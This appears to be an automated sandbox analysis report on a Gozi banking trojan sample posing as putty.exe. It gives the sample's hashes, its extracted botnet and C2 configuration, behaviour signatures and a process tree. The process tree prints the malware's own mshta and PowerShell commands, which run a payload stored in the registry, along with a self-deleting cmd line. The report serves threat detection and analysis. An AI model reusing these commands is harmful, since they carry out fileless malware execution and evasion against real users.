Overview

overview

10

Static

static

3

putty.exe

windows7-x64

10

putty.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-10-2023 11:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    putty.exe

  • Size

    293KB

  • MD5

    01435632dca9afc151eec77862bfbc2b

  • SHA1

    9bbb4ae83131fafcd14d580810b14f48d2d30837

  • SHA256

    2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

  • SHA512

    61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

  • SSDEEP

    3072:28g/bYYX0XH1anZAsaA6eRESzHxHH3zt8l7Mjd1i0ot:DyYa0XUZdaAnEqHxn3R82i0o

Score
10/10
gozi5050bankerisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

systemcheck.top
Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    PID:3804
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Modifies registry class
    PID:1932
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:4624
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:4044
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3104
        • C:\Users\Admin\AppData\Local\Temp\putty.exe
          "C:\Users\Admin\AppData\Local\Temp\putty.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:64
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 64 -s 1372
            3⤵
            • Program crash
            PID:4700
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lili='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lili).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9\\\MemoryLocal'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4136
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name yaepekrwih -value gp; new-alias -name rfjbix -value iex; rfjbix ([System.Text.Encoding]::ASCII.GetString((yaepekrwih "HKCU:Software\AppDataLow\Software\Microsoft\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9").ProcessActive))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1076
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zap45faa\zap45faa.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3500
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D49.tmp" "c:\Users\Admin\AppData\Local\Temp\zap45faa\CSC9A4D8F95C19849B8947D9140E4405C2.TMP"
                5⤵
                  PID:2272
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f4g1fwga\f4g1fwga.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2276
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7EC0.tmp" "c:\Users\Admin\AppData\Local\Temp\f4g1fwga\CSC4E526A0497CD492286C8D647FEF06BAD.TMP"
                  5⤵
                    PID:1492
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\putty.exe"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:2316
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:4148
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:2252
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 64 -ip 64
              1⤵
                PID:2556

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\RES7D49.tmp
                Filesize

                1KB

                MD5

                89843ff5c9eb6261bf7057840ee91a46

                SHA1

                fe32aa7e031ee85601de324869d8459cadd562c0

                SHA256

                f996077dc58fe7c55352003a3a1332270d7010923eb3654d9fad071f18ae49aa

                SHA512

                c56709fc0fb67c6daa6f77c9e4a8c43f236011b56037465d8dcfcb142b940038365d7df662a858f78f86ff3f0ec484b9c2a6073fb142568b6a079c9f09822cbb

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RES7EC0.tmp
                Filesize

                1KB

                MD5

                aa1df92bd500960b1bbdb45a2b625648

                SHA1

                96003c06c39c12937bd221aa353942247e1e54a9

                SHA256

                ee0fa1a1a80a1952ea46893a06f86a7b539652dd897606a112b885725d7c261b

                SHA512

                e99b8cce6437fdc04b85af244eafc71ec24b0f2b69aaad631df83ade21137dc80f188a89f23484660e95b32ff7ba6a3e32405be67fd072dfb47d1b18ad15fe14

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_emf0uqtr.2ts.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\f4g1fwga\f4g1fwga.dll
                Filesize

                3KB

                MD5

                544a73411351808f51fc27fdc57cdc40

                SHA1

                04bace750bbda815f3666e9bc5bde6f3d6d044ac

                SHA256

                e8da9d8f46970183ed3a84e723267ee5c942a75d42b9ac5283e0a3812852dbd3

                SHA512

                d9bef2f17a45a9ebb220630cf03e70ffb1cab1df9b80801c9e02cba9ad79372f0061bd4cb6b1d2e6e20516dc08631114238d857a6acfab77d2b7368ba75295ce

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\zap45faa\zap45faa.dll
                Filesize

                3KB

                MD5

                a5923273cf17bbd90a179ea7c243d623

                SHA1

                aec8bb76ee557c3891dce4ed5e2d2e67d85d4ba0

                SHA256

                fefed796b3bd4721841fe790302b6f3a7432b3ddeb81a7a79628ffe3ee909aa9

                SHA512

                2ce4022badcf4c6c2e7e762f49070b382863d9bb0052b3d5199b2d312c2aa994f14437003b02246a43d9da1f7ac65d65a28bb5b11a9715d341f3d8bbf2a2bdb9

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\f4g1fwga\CSC4E526A0497CD492286C8D647FEF06BAD.TMP
                Filesize

                652B

                MD5

                054fc805c06aa5115e54a0d6bbed44cc

                SHA1

                00a44b7aa77a4ec09cea72c5fd615375abc26ddf

                SHA256

                0c367c0162cace723c864e40620d42b865059169ddecd8be5c985a9eeed5e1fc

                SHA512

                c21562d4d4b8da7d4cf34157edca5ff3aab74a401e1f865900ebdc4bf4ccc07904a7ad471f742aa5c98d240586bbf299250c44675fe658e0065a7da9fe1969cc

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\f4g1fwga\f4g1fwga.0.cs
                Filesize

                406B

                MD5

                ca8887eacd573690830f71efaf282712

                SHA1

                0acd4f49fc8cf6372950792402ec3aeb68569ef8

                SHA256

                568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                SHA512

                2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\f4g1fwga\f4g1fwga.cmdline
                Filesize

                369B

                MD5

                1edfa7b32ff33a3476d14ac6a315b199

                SHA1

                d2171619794787049dd5844fa672b1fa00095f5d

                SHA256

                b0c60526cdd18ecf5fb3e56d6503cd39e668ec30bb1c12d461bdbb0ff62e1284

                SHA512

                cc1ae5beae2dba679b580216652970b6724d8482340bc679b55bf14dfd0accd5cf6dbc4082272ef627ce9f6cec9c1b60beecf664141c31c9770586551b159e38

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\zap45faa\CSC9A4D8F95C19849B8947D9140E4405C2.TMP
                Filesize

                652B

                MD5

                c62cc7d86550bdcc41b4c916122a0567

                SHA1

                03afe964d7f6507ab090c598cbb203450bf2d7ac

                SHA256

                2b84fc73c1c3f665857b78eb3dd6df8799db58bbb017d5e41a68ddd6ab51456c

                SHA512

                1c7ed46882a456894ff5701dbbb2479a2d9d196a225cd0b45588305a32f3d01f0e996d4b0126aa03ee8c37b9b49c491dc3bb5048adc77e851615b166eafdcbb2

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\zap45faa\zap45faa.0.cs
                Filesize

                405B

                MD5

                caed0b2e2cebaecd1db50994e0c15272

                SHA1

                5dfac9382598e0ad2e700de4f833de155c9c65fa

                SHA256

                21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                SHA512

                86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\zap45faa\zap45faa.cmdline
                Filesize

                369B

                MD5

                ebc1f34203f63abe65169c34ec159260

                SHA1

                e885056c003b73ff4accd13976a63c086358e0dc

                SHA256

                3494828f665d4ca07ac78c4290e3f59700c6cee840f19c5ccc07fe7854f35490

                SHA512

                3a102b3d791872301cb3815d25c063cc58d03ee6d80f64406986402a7a9fd797947e92a0af5e933fb39f0b7b6a9391e678726b87579f7b2a1d47b6bc95cd1e60

                Download Submit
              • memory/64-7-0x0000000002450000-0x0000000002550000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/64-1-0x0000000002450000-0x0000000002550000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/64-9-0x0000000002310000-0x000000000231B000-memory.dmp
                Filesize

                44KB

                Download
              • memory/64-8-0x0000000000400000-0x000000000228F000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/64-4-0x0000000003FF0000-0x0000000003FFD000-memory.dmp
                Filesize

                52KB

                Download
              • memory/64-3-0x0000000000400000-0x000000000228F000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/64-2-0x0000000002310000-0x000000000231B000-memory.dmp
                Filesize

                44KB

                Download
              • memory/1076-17-0x0000027A53970000-0x0000027A53992000-memory.dmp
                Filesize

                136KB

                Download
              • memory/1076-54-0x0000027A53B20000-0x0000027A53B5D000-memory.dmp
                Filesize

                244KB

                Download
              • memory/1076-25-0x0000027A53A00000-0x0000027A53A10000-memory.dmp
                Filesize

                64KB

                Download
              • memory/1076-24-0x0000027A53A00000-0x0000027A53A10000-memory.dmp
                Filesize

                64KB

                Download
              • memory/1076-23-0x0000027A53A00000-0x0000027A53A10000-memory.dmp
                Filesize

                64KB

                Download
              • memory/1076-22-0x00007FF8C0590000-0x00007FF8C1051000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/1076-52-0x0000027A53B10000-0x0000027A53B18000-memory.dmp
                Filesize

                32KB

                Download
              • memory/1076-38-0x0000027A539E0000-0x0000027A539E8000-memory.dmp
                Filesize

                32KB

                Download
              • memory/1076-68-0x0000027A53B20000-0x0000027A53B5D000-memory.dmp
                Filesize

                244KB

                Download
              • memory/1076-67-0x00007FF8C0590000-0x00007FF8C1051000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/1932-119-0x000002D460510000-0x000002D4605B4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1932-89-0x000002D460400000-0x000002D460401000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1932-88-0x000002D460510000-0x000002D4605B4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/2252-105-0x00000000007B0000-0x0000000000848000-memory.dmp
                Filesize

                608KB

                Download
              • memory/2252-102-0x00000000005C0000-0x00000000005C1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2252-98-0x00000000007B0000-0x0000000000848000-memory.dmp
                Filesize

                608KB

                Download
              • memory/2316-99-0x0000019E02EA0000-0x0000019E02EA1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2316-118-0x0000019E02DF0000-0x0000019E02E94000-memory.dmp
                Filesize

                656KB

                Download
              • memory/2316-95-0x0000019E02DF0000-0x0000019E02E94000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3104-57-0x00000000030D0000-0x00000000030D1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3104-56-0x0000000008980000-0x0000000008A24000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3104-96-0x0000000008980000-0x0000000008A24000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3804-112-0x0000021699A00000-0x0000021699AA4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3804-71-0x0000021699A00000-0x0000021699AA4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3804-70-0x0000021699790000-0x0000021699791000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4044-75-0x0000023BC2AA0000-0x0000023BC2B44000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4044-116-0x0000023BC2AA0000-0x0000023BC2B44000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4044-76-0x0000023BC2A60000-0x0000023BC2A61000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4148-107-0x0000025FE1360000-0x0000025FE1404000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4148-113-0x0000025FE1510000-0x0000025FE1511000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4148-114-0x0000025FE1360000-0x0000025FE1404000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4624-81-0x000001AB5E160000-0x000001AB5E204000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4624-117-0x000001AB5E160000-0x000001AB5E204000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4624-83-0x000001AB5DF50000-0x000001AB5DF51000-memory.dmp
                Filesize

                4KB

                Download